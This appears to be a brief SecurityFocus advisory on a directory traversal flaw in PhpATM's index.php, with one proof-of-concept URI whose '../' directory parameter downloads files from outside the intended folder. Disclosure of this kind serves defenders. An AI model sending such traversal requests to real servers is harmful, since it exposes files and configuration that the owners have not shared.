PhpATM Index.PHP Directory Traversal Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../


 

Privacy Statement
Copyright 2010, SecurityFocus